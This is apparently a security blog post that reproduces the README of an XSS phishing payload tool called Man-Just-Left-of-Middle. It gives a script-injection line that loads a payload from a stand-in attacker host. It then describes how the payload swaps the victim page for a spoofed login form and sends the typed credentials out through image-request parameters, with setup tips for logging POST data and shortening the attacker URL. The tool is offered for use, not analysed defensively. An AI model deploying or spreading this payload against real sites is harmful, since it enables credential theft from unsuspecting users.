Kos SecurityA blog about security.

Man-Just-Left-of-Middle

Man-Just-Left-of-Middle
MJLM
XSS Phishing Attack Tool.

This README applies specifically to the PHP version of this script.
There is a Python version which acts the same, but has XML logging.
The Python version does not yet have the same options as the PHP version.

## Explanation

This is not an exploit tool, it’s more of a payload tool.
Once you’ve found the exloit, and you’re able to inject javascript,
just stick this in there.

Basically…

<script src=”http://ATTACKER.COM/thebiz.php”>

You’re pretty much set.

## What exactly this does…

  1. The page is loaded with the script inconspicuously place.
  2. Once the script is hit, the script will look at the HTTP REFERER
  3. With the HTTP REFERER in hand, it uses get_file_contents() to fetch the URL [all that is supported at this thime, cURL and Socket will be added later]
  4. Since the server doesn’t have the authentication that the user does (presumably) the server is prompted with a an unauthenticated page, which often contains a form to login.
  5. All the returned data is filtered and escaped, making it possibly to embed it into javascript.
  6. As soon as the javascript, with the payload, is returned to the user, the browser replaces everything in <body> with what was returned within the javascript. Forms are then modified to have the onSubmit=”" functoin.
  7. When you submit, it loads an image with the input fields as get parameters. sleep() is called (it sucks, gotta replace it.)

## A few things

# Requirements

In php.ini
allow_url_fopen = On
For now. I’ll add in suport for cURL and Socket later.

Proper HTTP Referers sent by the victim. If this is spoofed, or disabled, there will be odd results.

Javascript my be enabled.

By default, the script will grab anything from $_POST and throw it in a file labeled “posts”
Create that file, make ir writeable, but non-readable. Right now there’s no functionality to
forward posts from the server spoofed page, but that will change in the future, and adding it
manually isn’t hard.

# Future plans

Expanded support for passing proper browser headers, instead of php headers.
cURL. Socket, because it’s probably faster.
Caching. (Save the page, then server that until X minutes/hours/days have passed, then recache it.)

# Anything else?

I suggest using .htaccess, or some other method, to slim down the URL.
|| RewriteRule ^a$ man-just-left-of-middle/thebiz.php
This will make http://ATTACKER.COM/a the script, and it will execute as normal, juts with a rewritten URL.

Will not work with URL redirection, because the HTTP referer is strippid.

Check the LICENSE file for licensing, GPLv2, etc etc.

WARNING: I have not completely bug tested this against vulns. I might have made a stupid mistake somewhere.
This is also doing some bandwidth intensive actoins (well, compared to none at all.)
Mileage may vary.

## Author

Kyle “Kos” Osborn
kyle@kyleosborn.com

http://kyleosborn.com/

@theKos

No comments posted.

Leave a Reply

Your email address will not be published. Required fields are marked *


nine × 5 =

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>